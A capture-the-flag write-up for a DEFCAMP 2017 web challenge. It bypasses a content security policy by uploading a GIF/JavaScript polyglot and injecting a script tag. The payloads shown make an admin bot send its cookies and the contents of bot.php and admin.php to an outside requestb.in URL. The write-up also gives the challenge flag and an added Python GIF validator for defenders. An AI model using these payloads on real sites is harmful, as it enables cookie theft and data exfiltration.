DEFCAMP CTF Quals 2017 -- LLC -- WebChall Writeup
Problem description
We are looking for your feedback about our new amazing company! :-)
Looking at the website, we notice that after submitting the form our inputs are reflected back exactly as we sent them.
So maybe an XSS? Let's try.
The problem here is that we have a CSP:
content-security-policy: default-src 'none'; img-src 'self' *.imgur.com *.ibb.co; script-src 'self'; connect-src 'self'; style-src 'self' fonts.googleapis.com fonts.gstatic.com 'unsafe-inline'; font-src 'self' fonts.gstatic.com fonts.googleapis.com;
The good part is that script-src points to 'self', so if we can somehow use the upload function to upload our JS payload, we can execute our exploit successfully.
The form only accepts jpg, jpeg, png and gif with a 500-byte maximum file size.
There is also an image format check, not only an extension check.
So an image/XSS polyglot would solve this.
Here is my GIF payload:
GIF89a= 'MUMBOJUMBOBOGUSBACON';document.location="https://requestb.in/um61ebum?v="+document.cookie;
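As an added example (not part of the writeup), here is the defender-side check the upload form would have needed: a strict structural GIF parser that walks the block sequence rather than only checking the GIF89a magic bytes, so data such as the polyglot pattern above (a constructed sample is used below) is rejected. A strict parse alone can still be defeated by a carefully built polyglot, so the reliable mitigation is to re-encode uploads and serve them from a separate origin with an image Content-Type and nosniff, so that script-src 'self' never covers user-supplied files.

```python
# Added example: strict structural GIF validation for an upload handler.
# A magic-byte check (data.startswith(b"GIF89a")) accepts a JS polyglot;
# walking the block structure does not. Standard library only.

def _skip_sub_blocks(data: bytes, pos: int):
    """Advance past length-prefixed sub-blocks up to the 0x00 terminator."""
    while pos < len(data):
        n = data[pos]
        pos += 1
        if n == 0:
            return pos
        pos += n
    return None  # ran off the end without a block terminator


def is_well_formed_gif(data: bytes) -> bool:
    """True only for a complete GIF87a/89a block sequence with nothing after the trailer."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return False
    pos = 6
    packed = data[pos + 4]      # logical screen descriptor: w(2) h(2) packed(1) bg(1) aspect(1)
    pos += 7
    if packed & 0x80:           # global color table present
        pos += 3 * (2 << (packed & 0x07))
    while pos < len(data):
        intro = data[pos]
        pos += 1
        if intro == 0x3B:       # trailer: must be the very last byte
            return pos == len(data)
        if intro == 0x2C:       # image descriptor
            if pos + 9 > len(data):
                return False
            lpacked = data[pos + 8]
            pos += 9
            if lpacked & 0x80:  # local color table
                pos += 3 * (2 << (lpacked & 0x07))
            pos += 1            # LZW minimum code size
            pos = _skip_sub_blocks(data, pos)
        elif intro == 0x21:     # extension block
            pos += 1            # extension label
            pos = _skip_sub_blocks(data, pos)
        else:                   # any other byte is not GIF structure (e.g. JavaScript text)
            return False
        if pos is None:
            return False
    return False                # no trailer found


# Constructed samples: a minimal valid 1x1 GIF, and a polyglot following the writeup's pattern.
MINIMAL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
               b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b")
POLYGLOT = b"GIF89a= 'MUMBOJUMBOBOGUSBACON';console.log('constructed sample');"
```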
We get our GIF link from the submitted form result.
Then we resend our payload in the name and message fields with our JS:
<script type="text/javascript" charset="ISO-8859-1" src="__f8f2bb3ab8715ec9dfc6b89173c06a9f/xss.gif"></script>
And the bot connects back:
QUERYSTRING
v: USERID=<SCRIPT>alert('XSS')</SCRIPT>
HEADERS
Accept-Encoding: gzip
Connect-Time: 1
Via: 1.1 vegur
Cf-Ray: 3a7bb8703f8e0f81-FRA
Cf-Connecting-Ip: 45.76.95.55
Cf-Visitor: {"scheme":"https"}
X-Request-Id: ec71d7c7-de29-4dd4-aca9-5186fa95060e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: requestb.in
Connection: close
Cookie: __cfduid=d8c8eca22ffed482d0d816ebe7ae673731506696251
Accept-Language: en-US,*
Cf-Ipcountry: DE
Total-Route-Time: 0
Referer: https://llc.dctf-quals-17.def.camp//bot.php?id=8173
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Nothing significant in the cookies.
We notice there is a nice page, bot.php.
Requesting the page ourselves gives nothing important,
so let's make the admin request it for us with his privileges.
New payload:
GIF89a= 'MUMBOJUMBOBOGUSBACON';var xh = new XMLHttpRequest();xh.open("GET", "bot.php?id=", false);xh.send();document.location="https://requestb.in/um61ebum?foo="+btoa(xh.responseText);
Still no flag yet.
After a while of searching we suddenly came across an admin.php page,
and we make the admin fetch the page for us:
GIF89a= 'MUMBOJUMBOBOGUSBACON';var xh = new XMLHttpRequest();xh.open("GET", "admin.php", false);xh.send();document.location="https://requestb.in/um61ebum?foo="+btoa(xh.responseText);
And we got the flag in the response:
DCTF{808f50ca3f3182a30e76bb9fcc0fdcb7f75f4ce597f7abe1793e3942acf3ec9e}
Note: I don't get how JS in a .gif file works with the nosniff flag in the headers.
I think it's served from Cloudflare and the admin is browsing the website without Cloudflare? Or is it the bot JS library used?